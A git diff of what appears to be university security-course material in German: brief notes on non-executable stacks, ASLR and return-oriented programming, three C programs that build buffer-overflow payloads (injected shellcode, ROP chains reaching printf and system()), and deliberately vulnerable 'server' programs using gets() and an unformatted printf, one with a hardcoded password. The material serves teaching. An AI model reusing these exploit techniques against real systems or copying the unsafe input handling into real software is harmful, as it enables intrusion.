diff --git a/20200629/bs-20200629.txt b/20200629/bs-20200629.txt
new file mode 100644
index 0000000000000000000000000000000000000000..5383b09abf5db3606a9eb9101f21965f1d2e683b
--- /dev/null
+++ b/20200629/bs-20200629.txt
@@ -0,0 +1,8 @@
+Exploits, 29.06.2020, 15:38:10
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
diff --git a/20200629/exploit-1.c b/20200629/exploit-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..a35dee9116d764073a7a6bebee1dffa4d67ed2e7
--- /dev/null
+++ b/20200629/exploit-1.c
@@ -0,0 +1,19 @@
+#include <unistd.h>
+#include <stdint.h>
+
+int main (int argc, char **argv)
+{
+  uint64_t my_program_address = 0x7fffffffdfa0;
+  for (int i = 2; i < 0x2a; i++)
+    write (1, "a", 1);                   // zum Auffüllen, um die Rücksprung-Adresse
+  write (1, &my_program_address, 8);     // überschreiben zu können
+  for (int i = 2; i < 34; i++)
+    write (1, "A", 1);
+  write (1, "\x48\x83\xec\x60", 4);      // sub    $0x60,%rsp     hierhin erfolgt der
+  write (1, "\x48\x89\xe7", 3);          // mov    %rsp,%rdi      "Rück-"Sprung
+  write (1, "\xb8\x00\x00\x00\x00", 5);  // mov    $0x0,%eax
+  write (1, "\xe8\x26\xfe\xff\xff", 5);  // callq  0x4003e0 <printf@plt>
+  write (1, "\xeb\xfe", 2);              // while (1);
+  write (1, "\n", 1);
+  return 0;
+}
diff --git a/20200629/exploit-1.txt b/20200629/exploit-1.txt
new file mode 100644
index 0000000000000000000000000000000000000000..974e383df36c343c8121fe13c3bf5e5a43d934aa
Binary files /dev/null and b/20200629/exploit-1.txt differ
diff --git a/20200629/exploit-2.c b/20200629/exploit-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..ecaab1d7877cbaeefd9d620e7ab41686e5e93bef
--- /dev/null
+++ b/20200629/exploit-2.c
@@ -0,0 +1,26 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x555555555176;
+  uint64_t add_offset_to_rdi = 0x55555555517d;
+  uint64_t dummy = 0;
+  uint64_t printf_address = 0x7ffff7e24560;
+  uint64_t exit_address = 0x7ffff7e05ea0;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "I 0WN U!!1!                             "
+                      "                                             ";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_rdi, 8);
+  write (1, &printf_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}
diff --git a/20200629/exploit-2.txt b/20200629/exploit-2.txt
new file mode 100644
index 0000000000000000000000000000000000000000..53b16fc729c568ce104acce9171c8f8b82d001c2
Binary files /dev/null and b/20200629/exploit-2.txt differ
diff --git a/20200629/exploit-3.c b/20200629/exploit-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..a8ddbd9c5ffc3b83ba3acba1d967969324860fbd
--- /dev/null
+++ b/20200629/exploit-3.c
@@ -0,0 +1,25 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x555555555176;
+  uint64_t add_offset_to_rdi = 0x55555555517d;
+  uint64_t dummy = 0;
+  uint64_t system_address = 0x7ffff7e109c0;
+  uint64_t exit_address = 0x7ffff7e05ea0;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "gimp ../common/os-layers.xcf.gz";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_rdi, 8);
+  write (1, &system_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}
diff --git a/20200629/exploit-3.txt b/20200629/exploit-3.txt
new file mode 100644
index 0000000000000000000000000000000000000000..d53f1c805994e7b4e4bf9c35cb75aa493aadc79d
Binary files /dev/null and b/20200629/exploit-3.txt differ
diff --git a/20200629/server-0.c b/20200629/server-0.c
new file mode 100644
index 0000000000000000000000000000000000000000..96f8b4df4c5a467aa5d2ec424434a6a33a6f6127
--- /dev/null
+++ b/20200629/server-0.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+  char name_buffer[100];
+  char *pass_buffer;
+  char username[] = "peter";
+  char password[] = "Hi!ph1sch";
+
+  printf ("Your name, please: ");
+  gets (name_buffer);
+  printf ("Hello, ");
+  printf (name_buffer);
+  printf ("!\n");
+
+  pass_buffer = getpass ("Your password, please: ");
+  if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+    printf ("You have access.\n");
+  else
+    printf ("Login incorrect.\n");
+  return 0;
+}
diff --git a/20200629/server-1.c b/20200629/server-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..68f9eb57f5e277413a0206ed9af175033e9cda9d
--- /dev/null
+++ b/20200629/server-1.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}
diff --git a/20200629/server-2.c b/20200629/server-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..4aac725ae5c30412f0952a770d1c9d9f6c1f6895
--- /dev/null
+++ b/20200629/server-2.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+  asm ("mov $0, %eax");
+  asm ("add $0x28, %rsp");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("mov %rsp, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("add $0x20, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  system ("clear");
+  exit (0);
+}
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}
diff --git a/20200629/server-3.c b/20200629/server-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..11c3a7ff2bf4e1f27accebd7d9caddf6d90dfb66
--- /dev/null
+++ b/20200629/server-3.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+  asm ("mov $0, %eax");
+  asm ("add $0x28, %rsp");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("mov %rsp, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("add $0x20, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  system ("clear");
+  exit (0);
+}
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  fgets (buffer, 20, stdin);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}